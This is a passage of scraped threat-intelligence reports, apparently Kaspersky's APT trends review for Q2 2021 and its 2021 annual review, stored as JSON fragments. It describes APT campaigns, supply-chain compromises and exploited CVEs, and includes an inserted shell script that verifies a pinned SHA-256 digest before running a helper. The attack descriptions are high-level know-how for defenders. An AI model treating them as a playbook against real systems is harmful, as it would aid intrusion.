included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. 
And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.\n\nWhile investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named "QSC", which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.\n\nEarlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. 
The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant's activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.\n\nWe discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call "TPCon", as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call "evsroin", used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found additional multiple malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. 
Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.\n\n## Middle East\n\nBlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found several samples of the group's unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group's activity.\n\nWe previously covered a WildPressure campaign against targets in the Middle East . Keeping track of the threat actor's malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the "client" programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol is quite recognisable across all programming languages used by the attackers. 
The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure's activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.\n\nWe discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script's main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.\n\nGoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor's primary motivation is espionage. 
Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanied detection logs, portray a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.\n\n## Southeast Asia and Korean Peninsula\n\nThe ScarCruft group is a geo-political motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in [Operation Powerfall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed "ATTACK-SYSTEM", also used multi-stage shellcode infection to deliver the same final payload named "BlueLight". BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.\n\nIn May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. 
Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed "Palwan". Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don't deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.\n\nBlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff's "SnatchCrypto" campaign in 2020, the group's strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim's machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. 
Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.\n\nWe have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. 
This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.\n\nWe recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.\n\nWe recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims' devices, such as contact lists, SMS messages, call recordings, media and other types of data. 
Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control if either Dropbox or another, hard coded server is used to exfiltrate stolen files.\n\n## Other interesting discoveries\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.\n\nVarious marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as "Moses". "Moses" appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. 
Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from "Moses". While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nIn another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of the early activity of it last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group's operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. 
Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed "Samurai", as well as describing a broader set of targets than the one documented thus far.

On 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between 31 January and 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash Uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines), and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven't yet been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools, we were able to collect one sample of a compromised Bash Uploader script, as well as identify some possibly associated additional malicious servers.

An e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it's still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studios on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.

A few days after April's Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries disguised as "April 2021 Security Update Installers". They were signed with a valid digital signature and delivered Cobalt Strike Beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike Beacon implants were configured with a hardcoded C2, "code.microsoft.com". Contrary to a (now redacted) publication from the Qihoo 360 team about this activity, we can confirm that there was no compromise of Microsoft's infrastructure. In fact, an unauthorized party took over the dangling subdomain "code.microsoft.com" and configured it to resolve to their Cobalt Strike host, set up around 15 April. That domain hosted a Cobalt Strike Beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn't affect unsuspecting visitors to this website because of the required unique user agent.

On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as part of the June Patch Tuesday. The exploit chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor which in turn connects to the C2 to get commands. So far, we haven't been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).

On April 16, we began hearing rumors from other researchers in the community about active exploitation of Pulse Secure devices. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, our initial thought was that the two were related, and that these were just rumors circulating in the community about old activity being brought to light again. Following this, we were able to at least confirm that the initial rumors concerned a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure: one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered "out-of-cycle" update and workaround packages to provide a solution for the multiple vulnerabilities.

Cooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to originate from the United Nations, using up-to-date related themes, or by setting up websites for non-existent organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.

## Final thoughts

While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we've seen in Q2 2021:

 * We have reported several supply-chain attacks in recent months. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.
 * APT groups mainly use social engineering to gain an initial foothold in a target network. However, we've seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call "Moses" and those used in the PuzzleMaker and Pulse Secure attacks and the Exchange server vulnerabilities.
 * APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages, as seen in WildPressure's macOS-supported Python malware.
 * As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments.

As always, we would note that our reports are the product of our visibility into the threat landscape.
However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "published": "2021-07-29T10:00:46", "modified": "2021-07-29T10:00:46", "href": "https://securelist.com/apt-trends-report-q2-2021/103517/", "reporter": "GReAT", "cvelist": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-1732", "CVE-2021-22893", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"]}
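The Codecov Bash Uploader incident described above turns on a CI job executing a third-party script as a trusted resource. One control a pipeline owner can apply is to pin the script's SHA-256 and refuse to run a fetched copy whose digest differs. The following is an added example written for this page, not Codecov's or Kaspersky's code; the file names and the two constructed scripts are assumptions made up for the demonstration, and it runs entirely offline.

```shell
#!/bin/sh
# Added example (not Codecov's or Kaspersky's code): a CI job pins the SHA-256
# of a third-party helper script and refuses to execute a fetched copy whose
# digest differs. The file names and the two constructed scripts below are
# assumptions made up for the demo; no network access is involved.
set -u

# Portable SHA-256 of a file (sha256sum on Linux, shasum on macOS/BSD).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_then_run SCRIPT EXPECTED_SHA256
# Executes SCRIPT only when its digest equals the pinned EXPECTED value;
# otherwise returns 1 without running anything. The digest is taken from the
# very file that is then executed, so the check and the use refer to the same
# bytes (no separate download step sits between them).
verify_then_run() {
    script="$1"; expected="$2"
    actual="$(sha256_of "$script")"
    if [ "$actual" != "$expected" ]; then
        echo "refusing to run $script: sha256 $actual does not match pinned $expected" >&2
        return 1
    fi
    sh "$script"
}

# make_fixture: constructed stand-ins for a genuine uploader script and a copy
# that was modified after the digest was pinned. Prints the directory holding them.
make_fixture() {
    dir="$(mktemp -d)"
    printf '%s\n' '#!/bin/sh' 'echo "uploading coverage report"' > "$dir/uploader.sh"
    cp "$dir/uploader.sh" "$dir/uploader_tampered.sh"
    printf '%s\n' 'echo "extra line added after the digest was pinned"' >> "$dir/uploader_tampered.sh"
    echo "$dir"
}

# demo: returns 0 when the genuine copy runs and the modified copy is refused.
# In a real pipeline PINNED is a constant committed alongside the CI config and
# changed deliberately on each vetted upgrade; here it is computed from the
# constructed genuine copy so that the example stays self-contained.
demo() {
    d="$(make_fixture)"
    PINNED="$(sha256_of "$d/uploader.sh")"
    verify_then_run "$d/uploader.sh" "$PINNED" || return 1
    if verify_then_run "$d/uploader_tampered.sh" "$PINNED" 2>/dev/null; then
        return 1   # the modified copy must never execute
    fi
    rm -rf "$d"
    return 0
}

demo
```

The same pinning applies to any helper a build fetches at run time; a digest mismatch is a signal to stop the job and investigate rather than to refresh the pin.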
{"securelist": [{"lastseen": "2021-11-30T10:36:53", "description": "\n\nIn the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters; you can find our quarterly overviews [here](<https://securelist.com/apt-trends-report-q1-2021/101967/>), [here](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [here](<https://securelist.com/apt-trends-report-q3-2021/104708/>)[.](<https://securelist.com/apt-trends-report-q3-2021/104708/>) For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape and it's important to note that no single vendor has complete visibility into the activities of all threat actors.\n\n## Private sector vendors play a significant role in the threat landscape\n\nPossibly the biggest story of 2021, an investigation by the Guardian and 16 other media organizations, published in July, suggested that over 30,000 human rights activists, journalists and lawyers across the world may have been targeted using Pegasus. The report, called [Pegasus Project](<https://www.amnesty.org/en/latest/press-release/2021/07/the-pegasus-project/>), alleged that the software uses a variety of exploits, including several iOS zero-click zero-days. Based on forensic analysis of numerous mobile devices, Amnesty International's Security Lab found that the software was repeatedly used in an abusive manner for surveillance. The list of targeted individuals includes 14 world leaders. Later that month, [representatives from the Israeli government visited the offices of NSO](<https://www.theguardian.com/news/2021/jul/29/israeli-authorities-inspect-nso-group-offices-after-pegasus-revelations>) as part of an investigation into the claims. 
And in October, India's Supreme Court commissioned a technical committee [to investigate whether the government had used Pegasus to spy on its citizens](<https://www.theregister.com/2021/10/29/india_nso_pegasus_probe/>). In November, Apple announced that it was taking [legal action against NSO Group](<https://www.theguardian.com/technology/2021/nov/23/apple-sues-israeli-cyber-firm-nso-group>) for developing software that targets its users with "malicious malware and spyware".\n\nDetecting infection traces from Pegasus and other advanced mobile malware is very tricky, and complicated by the security features of modern OSs such as iOS and Android. Based on our observations, this is further complicated by the deployment of non-persistent malware, which leaves almost no traces after reboot. Since many forensics frameworks require a device jailbreak, this results in the malware being removed from memory during the reboot. Currently, several methods can be used for detection of Pegasus and other mobile malware. [MVT (Mobile Verification Toolkit](<https://github.com/mvt-project/mvt>)) from Amnesty International is free, open source and allows technologists and investigators to inspect mobile phones for signs of infection. MVT is further boosted by a list of IoCs (indicators of compromise) collected from high profile cases and made available by Amnesty International.\n\n## Supply-chain attacks\n\nThere have been a number of high-profile supply-chain attacks in the last 12 months. Last December, it was reported that SolarWinds, a well-known IT managed services provider, had fallen victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. 
This resulted in the deployment of a custom backdoor named Sunburst on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nNot all supply-chain attacks have been that sophisticated. Early this year, an APT group that we track as BountyGlad compromised a certificate authority in Mongolia and replaced the digital certificate management client software with a malicious downloader. Related infrastructure was identified and used in multiple other incidents: this included server-side attacks on WebSphere and WebLogic services in Hong Kong, and Trojanized Flash Player installers on the client side.\n\nWhile investigating the artefacts of a supply-chain attack on an Asian government Certification Authority's website, we discovered a Trojanized package that dates back to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins that were deployed using PhantomNet malware, which were in turn delivered using the aforementioned Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware.\n\nIn April 2021, Codecov, provider of code coverage solutions, publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between January 31 and April 1. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports and send the results to the Codecov infrastructure. This script compromise effectively constitutes a supply-chain attack.\n\nEarlier this year we discovered [Lazarus group](<https://securelist.com/tag/lazarus/>) campaigns using an updated DeathNote cluster. Our investigation revealed indications that point to Lazarus building supply-chain attack capabilities. 
In one case we found that the infection chain stemmed from legitimate South Korean security software executing a malicious payload; and in the second case, the target was a company developing asset monitoring solutions, an atypical victim for Lazarus. As part of the infection chain, Lazarus used a downloader named Racket, which they signed using a stolen certificate. The actor compromised vulnerable web servers and uploaded several scripts to filter and control the malicious implants on successfully breached victim machines.

A previously unknown, suspected Chinese-speaking APT modified a fingerprint scanner software installer package on a distribution server in a country in East Asia. The APT modified a configuration file and added a DLL with a .NET version of a PlugX injector to the installer package. Employees of the central government in this country are required to use this biometric package to track attendance. We refer to this supply-chain incident and this particular PlugX variant as SmudgeX. The Trojanized installer appears to have been staged on the distribution server from March through June.

## Exploiting vulnerabilities

On March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft.
During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits had become available to multiple groups.

We also discovered a campaign active since mid-March targeting governmental entities in Europe and Asia using the same Exchange zero-day exploits. This campaign made use of a previously unknown malware family that we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.

On January 25, the Google Threat Analysis Group (TAG) announced a state-sponsored threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog where a Chrome exploit was waiting for them. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We confirmed that several pieces of infrastructure listed in the blog overlapped with [our previously published](<https://securelist.com/lazarus-threatneedle/100803/>) reporting about Lazarus group's ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle – malware that we have been tracking since 2018.
While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data related to the attack. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research.

Expanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Further analysis revealed that this escalation of privilege (EoP) exploit had potentially been used in the wild since at least November 2020. We reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310. Various marks and artifacts left in the exploit meant that we were highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as Moses. Moses appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from Moses.
While the EoP exploit was discovered in the wild, we weren't able to directly tie its usage to any known threat actor that we currently track. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.

On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an EoP exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 – RS5, 18362 – 19H1, 18363 – 19H2, 19041 – 20H1, 19042 – 20H2) and exploited two distinct vulnerabilities in the Microsoft Windows OS kernel. We reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8 as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a remote shell-style backdoor that in turn connects to the C2 to get commands. Because we couldn't find any connections or overlaps with a known actor, we named this cluster of activity PuzzleMaker.

Finally, late this year, we detected a wave of attacks using an elevation of privilege exploit affecting server variants of the Windows operating system.
Upon closer analysis, it turned out to be a zero-day use-after-free vulnerability in Win32k.sys, which we reported to Microsoft and which was consequently fixed as CVE-2021-40449. We analyzed the associated malware, dubbed the activity cluster MysterySnail, and found infrastructure overlaps that link it to the IronHusky APT.

## Firmware vulnerabilities

